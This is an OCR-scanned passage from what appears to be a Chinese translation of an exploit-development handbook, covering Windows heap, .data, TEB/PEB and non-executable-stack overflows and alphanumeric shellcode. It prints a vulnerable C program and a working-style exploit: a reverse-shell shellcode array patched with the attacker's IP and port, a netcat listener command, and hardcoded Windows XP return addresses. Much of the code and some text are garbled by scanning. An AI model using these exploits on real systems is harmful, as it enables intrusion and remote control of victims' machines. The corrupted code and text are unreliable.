当 对 象 实例 化 〈 就 是 说 被 创建 了 ) 时 ， 它 在 堆 上 就 已 经 准备 妥当 了 。 一 个 包含 函数 指针 的 表 
被 创建 ， 通 常 称 作 vtable， 这 些 指针 指向 对 象 支持 的 方法 。vtable 根 据 虚 拟 内 存 地 址 ， 为 对 象 数据 
分 配 空间 。 当 一 个 新 的 COM 对 和 象 被 创建 时 ， 它 们 被 放 在 先前 创建 的 对 象 上 面 ， 因 此 ， 如 果 一 个 
对 象 的 数据 段 的 缓冲 区 被 溢出 了 ， 会 发 生 什 么 ? 它 能 溢出 到 vtable 中 的 其 他 对 象 。 如 果 第 二 个 对 
象 的 某 个 方法 被 调用 , 就 有 可 能 出 问题 。 随 着 所 有 的 函数 指针 被 改写 , 攻击 者 可 以 控制 这 个 调用 。 
他 可 以 用 指向 缓冲 区 的 指针 改写 vtable 中 的 条 目 。 因 而 ， 当 对 象 的 方法 被 调用 时 ， 执 行路 径 被 重 
定向 到 攻击 者 的 代码 。 在 Internet Explorer 的 ActiveX 对 象 里 经 常会 见 到 它 。 基 于 COM 的 溢出 很 容 
易 被 利用 。 

2. 溢出 程序 控制 逻辑 数据 

破解 堆 溢 出 可 能 不 仅 限于 运行 攻击 者 提交 的 代码 。 你 可 能 只 想 改写 保存 在 堆 上 的 、 控 制 目 标 
程序 做 什么 的 变量 。 例 如 ， 假 设 Web 服 务 器 在 堆 上 保存 一 个 结构 ， 结 构 中 包含 虚拟 目录 权限 的 设 
置信 息 。 通 过 溢出 堆 缓冲 区 一 直到 溢出 这 个 结构 ， 将 很 有 可 能 把 Web 根 目录 标识 为 可 写 。 攻 击 者 
可 以 向 Web 服 务 器 上 传 一 些 东 西 ， 以 此 进行 发 泄 或 搞 破坏 。 
8.7.5 ”有 关 堆 的 总 结 

我 们 通过 破解 基于 堆 的 溢出 介绍 了 一 些 破解 方法 。 破 解 堆 溢出 的 最 好 方法 是 为 每 个 漏洞 量 身 
定制 攻击 代码 。 每 个 堆 溢出 都 可 能 和 其 他 的 堆 溢出 有 稍 许 不 同 。 这 使 得 溢出 在 某 些 场合 比较 容易 ， 
但 在 另外 的 场合 却 异常 困难 。 因 为 那些 已 经 超出 了 编程 的 责任 , 希望 我 们 已 经 示范 了 真正 的 危险 
在 于 没有 安全 地 使 用 堆 。 如 果 你 不 考虑 你 正在 做 什么 而 只 是 一 心 编码 , 难以 应 付 的 事情 还 会 发 生 。 


8.8 其 他 的 溢出 
本 节 介 绍 除 栈 、 堆 以 外 的 其 他 种 类 的 溢出 。 


8.8.4 .data 区 上段 溢出 

一 个 程序 由 不 同 的 区 段 组 成 。 运 行 代码 保存 在 .text 区 段 里 ，.data 区 段 包 含 诸如 全 局 变量 
之 类 的 东西 。 你 可 以 选择 /HEADERS 选 项 ， 用 dumpbin 将 区 段 信息 转 储 进 映像 文件 ， 用 
/SECTIONS: .section_name 选 项 获取 特定 区 段 的 详细 信息 。 虽 然 比 栈 或 堆 少 见得 多 ， 但 在 
Windows 中 ， 确 实 存在 .aata 区 段 溢出 ， 并 可 以 被 利用 ， 尽 管 时 间 选 择 是 一 个 障碍 。 更 多 解释 请 
参考 下 面 的 C 源 码 : 
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#include <stdio.h> 
#include <windows.h> 


unsigned char buffer[32]=""; 
FARPROC mprintf - 0; 
FARPROC mstrcpy - 0; 


int main(int argc, char *argv[l) 
{ 
HMODULE 1 = 0; 
1 = LoadLibrary ("msvert.dll"); 
if(!1) 
return 0; 
mprintf = GetProcAddress(1,"printf"); 
if(!mprintf) 
return 0; 
mstrcpy = GetProcAddress(1l,"strcpy"); 
if(!mstrcpy) 
return 0; 
(mstrcpy) (buffer,argv[1]); 
..asm( add esp,8 } 
(mprintf)("Ss",buffer): 
__asm{ add esp,8 } 
FreeLibrary (1); 


return 0; 

} . 

编译 并 运行 后 ， 程 序 会 动态 加 载 C 运 行 时 库 Cmsvert.dll), füfistrcpy O0 Mprintt() A 
数 的 地 址 。 存 储 这 些 地 址 的 变量 声明 为 全 局 的 ， 因 此 ， 它 们 保存 在 .data 区 段 里 。 同 样 要 注意 定 
义 的 全 局 32B 缓 冲 区 。 这 些 函 数 指针 被 用 来 复制 数据 到 缓冲 区 ， 并 输出 缓冲 区 的 内 容 到 控制 台 。 
然而 ， 要 注意 全 局 变量 的 排序 。 缓 冲 区 排 在 第 一 ， 接 下 来 的 是 两 个 函数 指针 。 它 们 以 同样 的 形式 
出 现在 .aata 区 段 里 ， 两 个 函数 指针 在 缓冲 区 后 。 如 果 缓 冲 区 被 溢出 ， 函 数 指针 也 将 被 改写 ， 在 
被 调用 时 ， 攻 击 者 可 以 重 定向 执行 流程 。 

当 以 一 个 超 长 的 参数 运行 这 个 程序 时 ,会 发 生 什 么 昵 。 传 递 给 程序 的 第 一 个 参数 被 strcpy 
函数 指针 复制 到 缓冲 区 ， 从 而 导致 缓冲 区 被 溢出 ， 并 改写 函数 指针 。 接 下 来 调用 printf 函 数 指 
针 ， 攻 击 者 获得 控制 权 。 当 然 ， 为 了 演示 这 个 问题 ， 这 里 使 用 了 一 个 简单 的 C 程 序 。 在 实际 环境 
中 ， 事 情 可 没 这 人 么 容易 。 在 真正 的 程序 里 ， 溢 出 后 的 函数 指针 可 能 不 会 被 立即 调用 ， 而 是 直到 
很 多 行 以 后 才 被 调用 。 在 这 段 时 间 里 ， 用 户 提交 的 代码 可 能 已 经 被 缓冲 区 的 重用 机 制 清除 了 。 
这 就 是 为 什么 说 时 间 选 择 可 能 是 这 类 破解 的 障碍 。 在 这 个 程序 里 , 当 printf 哺 数 指针 被 调用 时 ， 
EAX 指向 缓冲 区 的 开头 ， 于 是 可 以 用 一 个 包含 jmp eax 或 call eax 的 地 址 改写 函数 指针 。 而 且 ， 
因为 缓冲 区 被 作为 一 个 参数 传递 给 printf 函 数 ， 所 以 在 ESP+8 处 也 能 发 现 对 它 的 引用 。 这 意味 
着 我 们 用 另外 一 个 方法 。 可 以 用 pop reg. pop reg、ret 指 令 块 的 开始 地 址 改写 printf 子 
数 的 指针 ， 这 样 ， 当 两 条 pop 执 行 后 ，EsP 将 指向 缓冲 区 。 因 此 ， 当 ret 执 行 时 ， 我 们 在 缓冲 
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KEFA, FORT. PAARE, RABEL. .datak Bri REEF KE AE, 
总 是 能 在 固定 的 地 方 发 现 缓冲 区 〈 它 在 .data 区 段 里 )， 因 此 ， 我 们 总 是 能 用 它 的 固定 位 置 改 
写 函 数 指针 。 


8.8.2 TEB/PEB 溢出 

出 于 完整 性 的 考虑 ， 尽 管 到 目前 为 止 还 没有 任何 关于 这 种 溢出 的 公开 记录 , 但 TEB 溢 出 的 可 
能 性 是 存在 的 。 每 个 TEB 都 会 有 一 个 缓冲 区 ， 用 于 把 ANSI 字 符 串 转换 为 Unicode 字 符 串 。 
SetCcomputerNmaea 和 GetModuleHandlea 这 样 的 函数 就 使 用 这 个 缓冲 区 ， 它 有 固定 的 大 小 。 假 
如 函数 使 用 这 个 缓冲 区 而 不 做 长 度 检查 ， 或 者 向 这 个 函数 隐瞒 ANSI 字 符 的 实际 长 度 ， 那 么 就 有 
可 能 溢出 这 个 缓冲 区 。 如 果 出 现 这 种 情形 ， 怎 么 利用 它 执 行 任意 代码 呢 ? 这 要 看 是 哪个 TEB 被 溢 
出 了 。 如 果 是 第 一 个 线程 的 TEB， 那 就 可 以 溢出 到 PEB。 还 记得 吗 ， 我 们 在 较 早 的 时 候 提 到 过 : 
当 一 个 进程 关闭 时 ， 将 引用 PEB 里 某 些 指针 。 如 果 可 以 改写 这 些 指针 中 的 任何 一 个 ， 就 有 可 能 获 
得 执行 控制 权 。 如 果 它 是 其 他 线程 的 TEB， 就 可 以 溢出 到 其 他 的 TEB。 

每 个 TEB 里 都 有 一 些 感 兴趣 的 指针 可 以 被 改写 , 诸如 指向 第 一 个 帧 的 EXCEPTION REGISTR- 
ATION 结 构 的 指针 。 在 我 们 刚刚 拥有 的 TEB 的 线程 里 ， 需 要 以 某 种 方式 来 引起 异常 。 当 然 ， 也 
可 以 连续 溢出 一 些 TEB， 直 到 最 后 溢出 到 PEB， 并 改写 保存 在 它们 之 中 的 指针 。 如 果 这 样 的 溢 
出 存在 ， 那 么 应 该 是 可 以 破解 的 ， 虽 然 有 些 困 难 ， 但 并 不 是 不 可 能 ， 因 为 这 种 溢出 的 元 凶 是 


Unicode。 
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为 了 解决 栈 溢出 问题 ，Sun Solaris 把 栈 标记 为 不 可 执行 。 这 样 ， 企 图 在 栈 里 运行 代码 的 破解 
代码 将 会 失败 。 然 而 ， 基 于 x86 处 理 器 的 Solaris 栈 不 能 被 标记 为 不 可 执行 。 但 现在 有 些 安全 产品 
可 以 监视 正在 运行 中 的 进程 的 栈 ， 如 果 发 现 有 代码 在 栈 上 执行 ， 将 终止 这 个 进程 。 

为 了 运行 自己 的 代码 ， 有 些 方法 可 以 战胜 受 保 护 栈 。Solar Designer 提 出 : 用 system() 函数 
的 地 址 改写 保存 的 返回 地 址 ， 接 着 伪造 (从 系统 的 角度 ) 返回 地 址 ， 因 此 ， 就 会 有 一 个 指针 指向 
你 想 运行 的 命令 。 这 样 ， 当 ret 被 调用 时 ， 执 行 流程 被 重 定向 到 system() 函数 ， 当 前 的 EsP 指 向 
伪造 的 返回 地 址 。 直 到 执行 这 个 系统 函数 前 ， 系 统 都 按 正 常情 况 运行 。 它 的 第 一 个 参数 在 BEsP+4， 
在 那里 能 发 现 指向 我 们 命令 的 指针 。David Litchfiled 写 过 一 篇 论文 ， 文 中 介绍 了 怎样 在 Windows 
上 使 用 这 个 方法 。 不 过 , 我 们 后 来 了 解 到 还 有 更 好 的 方法 可 以 破解 不 可 执行 栈 。 随 着 研究 的 深入 ， 
我 们 在 Bugtraq 上 偶然 看 到 了 Rafal Wojtczuk 发 的 帖子 (http://community.core-sdi.com/~juliano/non- 
exec-stack-problems.html)， 它 介绍 了 有 同样 功能 的 方法 。 这 个 方法 涉及 字符 串 副 本 的 使 用 ， 至 今 
在 Windows 平 台 上 还 没有 文档 化 ， 所 以 ， 我 们 现在 照 着 做 一 下 。 

用 system() 地 址 改写 保存 的 返回 地 址 会 有 些 问题 : Windows 上 system() 由 msvcrt .311 输 
出 ， 在 不 同 的 系统 上 《甚至 是 同一 系统 的 不 同 进 程 间 )， 这 个 DLL 在 内 存 中 的 位 置 变 化 非常 大 。 
而 且 不 能 通过 运行 一 条 命令 来 访问 Windows API， 这 就 使 得 我 们 对 想 做 的 事情 只 有 很 小 的 控制 力 
度 。 更 好 的 方法 可 能 是 把 缓冲 区 复制 到 进程 堆 或 其 他 可 写 / 可 执行 的 内 存 区 域 ， 然 后 返回 到 这 个 
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地 方 并 执行 它 。 这 个 方法 涉及 用 字符 串 副本 函数 的 地 址 改写 保存 的 返回 地 址 。 就 像 我 们 不 能 选择 
system() 的 理由 一 样 , 我 们 也 不 能 选择 strcpy (), strcpy() 也 由 msvcrt.dl11 输 出 。 但 1strcpy() 
却 不 同 ， 它 由 kernel32.q11 输 出 ， 至 少 可 以 保证 在 同一 系统 的 每 个 进程 里 ， 它 都 有 相同 的 基 址 。 
如 果 在 使 用 lstrcpy() 时 碰 到 问题 (例如 ， 它 的 地 址 中 包含 了 像 0x0A 这 样 的 坏 字 符 )， 还 可 以 向 
lstrcat 求 助 。 

把 缓冲 区 复制 到 哪 昵 ? 我 们 可 以 在 堆 里 找 一 个 地 方 , 但 是 , 破坏 堆 和 阻塞 进程 都 会 丧失 机 会 。 
进入 TEB， 每 个 TEB 都 有 一 个 520B 长 的 缓冲 区 ， 用 于 把 ANSI 字 符 串 转换 为 Unicode 字 符 串 ，TEB 
开头 到 缓冲 区 的 偏 移 量 是 0xC00。 进 程 中 第 一 个 线程 的 TEB 在 0x7FFDE000 处 ， 因 此 缓冲 区 位 于 
0x7FFDEC00 处 。 诸 如 GetModuleHandlea 之 类 的 函数 用 这 个 空间 进行 字符 串 转换 。 我 们 可 以 把 它 
作为 目的 缓冲 区 提供 给 lstrcpy (), 但 因为 在 结尾 处 有 NULL， 所 以 实际 上 提供 的 是 0x7FFDEC04。 
然后 ， 我 们 需要 知道 缓冲 区 在 栈 中 的 位 置 ， 因 为 这 是 字符 串 结尾 的 值 ， 即 使 这 个 栈 地 址 在 NurL 
之 前 〈 例 如，0x0012FFD0)， 那 也 不 要 紧 。 由 NuLL 充 当 字符 串 的 终止 符 ， 真 是 一 对 完美 的 结合 ， 
不 是 吗 ? 最 后 , 需要 把 这 个 地 址 设 为 shellcode 复 制 到 的 地 方 , 而 不 是 提供 一 个 伪造 的 返回 地 址 ， 
所 以 ， 当 lstrcpy 返 回 时 ， 执 行 流程 进入 了 我 们 的 缓冲 区 。 

图 8-4 显 示 了 栈 在 溢出 前 后 的 状态 。 


0x0012FFD0 0x0012FFD0 
缓冲 区 起 始 CODE 


保存 的 基 指 针 C CODE 
保存 的 返回 地 址 TRCPY0 的 地 址 


LS 
Ox7FFDECO4 
LSTRCPY0 的 返回 地 址 






Ox7FFECO4 


指向 目标 地 址 的 指针 
0x0012FF00 
指向 源 地 址 的 指针 


溢出 前 洲 出 后 
图 8-4 溢出 前 /后 的 栈 


当 脆 弱 的 函数 返回 时 , 将 从 栈 上 取 回 原先 保存 的 返回 地 址 。 因 为 用 lstrcpy () 的 地 址 改写 了 
真正 保存 的 返回 地 址 ， 所 以 , 在 函数 返回 后 ,程序 运行 到 1strcpy()。 运 行 到 lstrcpy () 时 ，ESP 
指向 保存 的 返回 地 址 ,然后 , 程序 将 跳 过 保存 的 返回 地 址 直接 访问 它 的 参数 一 一 源 和 目的 缓冲 区 。 
它 把 0x0012FFD0 的 数据 复制 到 0x7FFDEC04， 直 到 直到 第 一 个 NULL ( 它 将 出 现在 结尾 的 地 方 
图 8-4 的 底部 靠 右 的 位 置 ), 一 旦 完成 复制 ,lstrcpy 返 回 到 我 们 的 新 缓冲 区 ， 并 从 那里 继续 执行 。 
当然 ， 提 供 的 shellcode 必 须 小 于 $20B (TEB 自 带 缓冲 区 的 大 小 )， 否 则 ， 就 可 能 会 溢出 这 个 缓冲 
区 ， 或 进入 其 他 的 TEB， 这 要 看 你 选择 的 是 否 是 第 一 个 线程 的 TEB 了 ， 如 果 是 ， 将 会 溢出 到 PEB。 
《我 们 随后 将 讨论 TEB/PEB-based 溢 出 的 可 能 性 。) 
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在 查看 代码 之 前 ， 应 当先 考虑 这 个 破解 代码 。 如 果 破 解 代码 中 使 用 了 利用 TEB 缓 冲 区 进行 
ANSI 到 Unicode 转 换 的 函数 ， 破 解 代码 将 被 终止 。 不 必 担 心 ，TEB 里 还 有 很 多 未 使 用 的 空间 ( 确 
切 地 说 ， 有 些 空间 不 重要 )， 我 们 可 以 利用 这 些 空间 。 例 如 ， 第 一 个 线程 的 TEB 里 从 0x7FFDE1BC 
开始 的 地 方 就 是 块 风水 宝地 。 

现在 看 一 个 例子 。 首 先是 脆弱 的 程序 : 


#include <stdio.h> 
int foo(char *); 


int main(int argc, char *argv[]) 
{ 
unsigned char buffer[520]=""; 
if(arge !=2) 
return printf("Please supply an argument!\n"); 
foo(argv[11); 
return 0; 


} 


int foo(char *input) 

{ 
unsigned char buffer[600]=""; 
printf("$.8XWMn",&buffer); 
strepy (buffer, input); 
return 0; 


) 
foo O 函数 有 栈 溢出 问题 。 它 使 用 600B 的 缓冲 区 来 调用 stzcpy， 但 事先 没有 检查 源 缓 冲 区 。 
当 溢 出 这 个 程序 时 ， 用 lstrcatA 的 地 址 改写 保存 的 返回 地 址 。 


注解 在 Windows XP SP1 上 ，1strcpy 里 有 0x0RA。 


于 是 ， 我 们 把 保存 的 返回 地 址 设 为 1stzcata 返 回 时 的 地 址 〈 在 这 里 将 把 它 设 为 TEB 里 的 新 
的 缓冲 区 )。 最 后 需要 为 lstrcatA (TEB) 设置 目的 缓冲 区 和 源 缓 冲 区 ， 两 个 缓冲 区 都 在 栈 上 。 
这 些 例 子 都 是 在 Windows XP SP1 上 用 Microsoft Visual C++ 6.0 编 译 的 。 我 们 写 的 破解 代码 是 可 移 
植 的 Windows 反 向 shellcode。 它 可 以 在 任何 版 本 的 Windows NT 或 更 新 的 系统 上 运行 ， 利 用 PEB 得 
到 已 加 载 模 块 的 列表 。 从 这 里 开始 ， 它 得 到 kerne132 .611 的 基 址 ,然后 分 析 kerne132.d11 的 PE 
头 部 得 到 GetProcaadress 的 地 址 。 有 了 这 个 地 址 和 kerne132.dl1 的 基 址 ， 我 们 可 以 得 到 
LoadLibraryaR 的 地 址 ， 有 了 这 两 个 函数 ， 我 们 就 可 以 为 所 和 欲 为 了 。 用 netcat 监 听 端 口 : 

C:\>ne.-1 -p 53 
然后 运行 这 个 破解 ， 就 可 以 得 到 一 个 反 向 shell。 


#include <stdio.h> 
#include <windows.h> 
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unsigned char exploit[510]= 

"\x55\x8B\xXEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\XFF\XBE\xFF\XxFF" 
“\XPFF\XFF\X81\xF6\xDC\XFE\XFF\XFF\x03 \XDE\x33\xC0\x50\x50\x50\x50" 
"\x50\x50\x50\x50\x50\x50\xFF\xD3 \x50\x68\x61\x72\x79\x41\x68\x4C" 
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x*54\xFF\X75\xXFC\XFF\xX55\xF4\x89" 
"\x45\xFO\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\X30\x13" 
"\x83\xEB\x01\xE2\xF9\x43\x53 \xXFF\x75\xFC\xXFF\x55\xF4\x89\x45\xEC" 
"\x83\xC3\x10\x53\xFF\x75\XFC\XFF\x55 \xF4\x89\x45\xE8\x83\xC3\x0C" 
"\x53\XFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89" 
"\x45\xE4\x83\xC3\x0C\x53\xXFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83" 
"\xC3\x0C\x53\XFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89" 
"\x5D\xD8 \x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33" 
"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A" 
"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\XFF\x66" 


"\x35\xXFF\xXCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45" - 


"\xE0O\x6A\xX10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0" 
"\x44\x89\x85\x58\xXFF\XFF\XFF\x83 \xC0O\x5E\x83\xC0O\x5E\x89\x45\x84" 
"\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\XFF\XFF\x57" 
"\x8D\xBD\x58\XFF\XFF\XFF\X57\x33\xC0\x50\x50\x50\x83\xCO\x01\x50" 
"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xPFF\x55\xE8" 
"\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD" 
"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2 \x8B\xDA\x8B\xCA\x03 \x52\x3C\x03" 
"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48" 
"\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83" 
"\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41" 
"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0OF\xB7\x01\x03" 
"\x3C\x83\xX89\*7C\x24\x44\x8B\x3C\xK24\x89\x7C\x24\x4C\x5F\x61\xC3" 
"\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xKAF\x8D\x90\x9C\x9A\x8C\x8C" 
"\XBE\XFF\xFF\xBA\x87\x96\x8B\xXAB\xX97\x8D\x9A\x9E\x9B\xXFF\XFF\xA8" 
"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B" 
"\x9E\x8D\x8B\x8A\x8F\XFF\XFF\XA8 \XAC\xXBE\XAC\x90\x9C\x94\x9A\x8B" 
"\xXBE\XFF\xXFF\x9C\x90\x91\x91\x9A\x9C\xX8B\XFF\x9C\x92\x9B\XFF\XFF" 
"AxFFAXFFAXFFAXPFE"; 


int main(int argc, char *argv[]) 


{ 


int cnt = 0; 
unsigned char buffer[1000]z""; 


if(argc !-3) 
return 0; 


StartWinsock(); 


// Set the IP address and port in the exploit code 


159 


// If your IP address has a NULL in it then the string will be truncated. 


SetUpExploit (argv[1],atoi(argv[2])); 


// name of the vulnerable program 
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strcpy(íbuffer,"nes "); 
// copy exploit code to the buffer 
strcat (buffer, exploit); 


// Pad out the buffer 
while(cnt « 25) 


{ 
strcat (buffer, "\x90\x90\x90\x90"); 


ent ++; 


strcat (buffer, "\x90\x90\x90\x90"); 


// Here's where we overwrite the saved return address 
// This is the address of lstrcatA on Windows XP SP 1 
// Ox 7E74B66 

strcat (buffer, "\x66\x4B\xXE7\x77") ; 


// Set the return address for lstrcatA 
// this is where our code will be copied to in the TEB 


strcat (buffer, "\xBC\xE1\xFD\x7F"); 


// Set the destination buffer for lstrcatA 
// This is in the TEB and we'll return to here. 
strcat (buffer, "\xXBC\xXEL\xFD\x7F"); 


// This is our source buffer. This is the address 
// where we find our original buffer on the stack 
strcat (buffer, "\x10\xFB\x12"); 


// Now execute the vulnerable program! 
WinExec(buffer,SW MAXIMIZE); 


return 0; 


int StartWinsock() 

{ 
int err=0; 
WORD wVersionRequested; 
WSADATA wsaData; 


wVersionRequested = MAKEWORD( 2, 0 ); 
err = WSAStartup( wVersionRequested, &wsaData ); 
if ( err !- 0 ) 
return 0; 
if ( LOBYTE( wsaData.wVersion ) !- 2 || HIBYTE(wsaData.wVersion ) 
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WSACleanup( ); 
return 0; 
} 
return 0; 
} 
int SetUpExploit(char *myip, int myport) 
{ 
unsigned int ip=0; 
unsigned short prt=0; 
char *ipt=""; 
char *prtt=""; 


ip = inet_addr(myip); 


ipt = (char*)&ip; 

exploit(191]=ipt[0]; 
exploit [192)=ipt[1]; 
exploit[193]=ipt[2]; 
exploit [194]=ipt[3]; 


// set the TCP port to connect on 
// netcat should be listening on this port 
// e.g. nc -1 -p 53 


prt - htons((unsigned short)myport); 
prt = prt ^ OxFFFF; 

prtt = (char *) &prt; 
exploit[209]-prtt[0]; 
exploit[210]-prtt[1]; 





return 0; 


} 
8.10 小结 


本 章 介绍 了 Windows 缓冲 区 溢出 破解 的 高 级 部 分 。 希 望 这 些 例子 和 说 明 已 经 向 您 传达 了 这 样 
的 思想 : 即使 有 些 溢出 最 初 看 起 来 难以 破解 ， 但 通过 不 断 尝 试 ， 最 后 一 定 会 成 功 。 可 以 假设 缓冲 
区 溢出 总 是 可 以 破解 的 ， 我 们 需要 做 的 只 是 花 些 时 间 寻 找 破 解 它 的 方法 罢了 。 






战胜 过 滤器 








为 某 些 程序 在 接受 输入 时 ， 会 过 滤 不 和 良 数据 ， 所 以 在 编写 利用 缓冲 区 溢出 的 代码 时 ， 

可 能 会 碰 到 一 些 问 题 ， 比 如 ， 目 标 程序 可 能 只 接受 字母 和 数字 : A 一 Z，a 一 z，0 一 9。 

在 这 种 情况 下， 我们 需要 绕 过 两 个 障碍 。 第 一 ， 编 写 的 利用 代码 必须 符合 过 滤器 的 要 求 ， 第 二 ， 
必须 找到 合适 的 值 来 改写 保存 的 返回 地 址 或 函数 指针 ， 而 这 又 要 看 是 破解 何 种 溢出 ， 而 且 这 个 值 
也 需要 被 过 滤器 接受 。 假 如 磁 到 不 太 苛刻 的 过 滤器 ， 比 如 ， 接 受 可 打印 的 ASCII 或 Unicode 字 符 ， 
我 们 通常 可 以 解决 第 一 个 问题 ， 但 要 解决 第 二 个 问题 ， 在 一 定 程度 上 要 看 运气 、 毅 力 和 技巧 了 。 


9.1 为 仅 接受 字母 和 数字 的 过 滤器 写 破 解 代码 


我 们 以 前 曾 看 过 一 些 由 可 打印 的 ASCII 字 符 组 成 的 破解 代码 ， 就 是 说 ， 每 一 个 字 节 必须 在 A 
到 Z (0x41 到 0x5A)、a 到 z (0x61 到 0x7&R) 或 0 到 9 (0x30 到 0x39) 之 间 。Riley “Caezar” Eller 
l 在 他 的 论文 Bypassing MSB Data filters for Buffer Overflows (2000468) 里 第 一 次 提 到 了 这 种 仅 
由 0x20 到 0x7F 之 间 的 符号 组 成 的 shellcode。 如 果 你 对 突破 过 滤器 的 限制 有 兴趣 ,这 篇 文章 是 个 不 
错 的 入 门 材料 。 
用 字母 、 数 字 字 节 操作 码 写 shellcode 的 基本 方法 ， 通 常 称 为 桥接 法 。 例 如 ， 如 果 想 执行 cal1 
eax 指 令 (OxFF 0xD0)， 需 要 把 下 面 的 代码 写 到 栈 上 : 


push 30h (6A 30) // Push 0x00000030 onto the stack 

pop eax (58) // Pop it into the EAX register 

xor al,30h (34 30) // XOR al with 0x30. This leaves 0x00000000 in EAX. 
dec eax (48) // Take 1 off the EAX leaving OxFFFFFFFF 


xor eax,7A393939h (35 39 39 39 7A) // This XOR leaves 0x85C6C6C6 in EAX. 
xor eax,55395656h (35 56 56 39 55) // and this leaves OxDOFF9090 in EAX 
push eax (50) // We push this onto the stack. 


看 起 来 很 好 ， 我 们 好 像 可 以 用 类 似 的 方法 写 shellcode， 但 实际 上 会 碰 到 问题 。 我 们 把 代码 写 
到 栈 上 ， 将 需要 跳 转 到 或 调用 它 。 但 因为 pop esp 中 包含 0ox5c 字 节 值 〈 反 斜 线 符 号 )， 所 以 不 能 
直接 执行 它 。 那 怎么 操作 EsP 呢 ?” 记 住 ， 我 们 最 后 需要 把 写真 正 破解 代码 的 代码 和 这 个 破解 代码 
结合 起 来 。 这 意味 着 ，EsP 的 地 址 肯定 高 于 当前 执行 的 地 址 。 假 设 在 开始 执行 的 地 方 有 一 个 栈 组 
冲 区 溢出 ， 就 可 以 用 INc ESP (0x44) 向 上 调整 BSP。 然 而 ， 这 样 不 太 好 ， 因 为 一 条 INC ESP 指 令 
只 能 使 ESP 的 地 址 加 1， 且 INC ESP 指 令 占 用 1 字 节 ， 需 要 多 次 调整 才能 到 达 目 标 。 而 我 们 需要 一 
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条 大 范围 调整 ESP 的 指令 。 

popad 指 令 很 适合 这 种 情况 。popad〔 对 应 于 pushad〉 从 ESP 的 顶部 取 走 32B， 然 后 把 
它们 有 序 地 放 入 寄存 器 。popad 不 直接 更 新 的 寄存 器 只 有 ESP, 但 ESP 的 调整 反映 出 已 经 从 栈 
上 移 去 了 32B。 这 样 ， 如 果 当 前 在 ESsP 处 执行 ， 只 需 执行 几 次 popad，ESP 指 向 的 地 址 将 高 于 
当前 的 地 址 。 因 此 ， 当 把 shellcode 压 入 时 ， 两 者 将 在 中 间 相 遇 ， 我 们 架 起 了 一 座 连 接 彼 此 的 
桥 。 

做 任何 与 破解 相关 的 事情 都 需要 许多 类 似 的 入 侵 技 巧 。 在 前 面 cal1l eax 的 例子 中 ， 我 们 
用 17B 的 字母 、 数 字 写 出 了 4B 的 shellcode。 经 常 使 用 的 可 移植 的 Windows 反 向 shellcode 大 概 有 
500B， 与 它 对 应 的 ， 只 用 字母 、 数 字 写 的 shellcode 可 能 超过 2 000B。 然 而 ， 更 痛苦 的 是 改写 的 
过 程 ， 而 且 ， 如 果 想 新 增加 功能 ， 一 切 都 要 从 零 开 始 。 怎 么 解决 这 个 问题 呢 ? 译 码 器 该 派 上 用 
场 了 。 

如 果 先 写 出 原始 的 破解 ， 然 后 将 它 编 码 ， 那 么 只 需要 先 用 ASCI 写 一 个 译 码 器 ， 然 后 转译 并 
执行 这 个 破解 即 可 。 这 个 方法 只 需 先 写 一 个 小 的 ASCII shellcode， 减 少 破解 代码 的 总 长 度 。 那 该 
选用 何 种 编码 方法 呢 ? Base64 编 码 方案 看 起 来 是 个 不 错 的 选择 。Base64 把 3B 转 为 可 打印 的 4B， 
通常 用 于 在 网 络 上 传输 二 进 制 文件 。Base64 就 像 放大 镜 一 样 ， 把 3B 原 始 的 shellcode 译 成 4B 编 过 码 
的 shellcode。 然 而 ，Base64 编 码 表 中 包含 了 一 些 非 字 母 、 数 字 的 字符 ， 因 此 ， 我 们 不 得 不 选择 其 
他 的 编码 方法 。 比 较 好 的 办 法 是 ， 采 用 和 更 小 的 译 码 器 相对 应 的 自 定义 编码 方法 。 在 这 里 ， 我 们 
建议 用 Base64 的 变种 一 一 Base16。 下 面 是 它 的 工作 原理 。 

Base16 把 一 个 8 位 字 节 分 成 两 个 4 位 字 节 ， 每 个 4 位 再 加 上 0x41。 这 样 一 来 ， 就 能 把 任意 
一 个 8 位 字 节 转换 成 值 域 在 0x41 与 0x50 之 间 的 2B。 例 如 ， 如 果 一 个 8 位 字 节 是 0x90〔( 二 进 制 
是 10010000)， 把 它 分 成 2 个 4 位 部 分 ，1001 和 0000; 各 加 上 0x41， 将 得 到 0x4A 和 0x41 (J 
ANA). 

译 码 器 的 工作 流程 恰好 相反 。 它 首先 取 第 一 个 字符 J “在 这 个 例子 里 是 0x4A)， 减 去 0x41， 
然后 左 移 4 位 ， 再 加 上 第 二 个 字 节 ， 并 减 去 0x41。 经 过 这 样 的 处 理 之 后 ， 我 们 又 得 到 了 0x90。 


Here: 


mov al,byte ptr [edi] 
sub al,41h 
shi al,4 
inc edi 
add al,byte ptr [edi] 
sub al,41h 
mov byte ptr fesi],al 
inc esi 
inc edi 
emp byte ptr[edi],0x51 
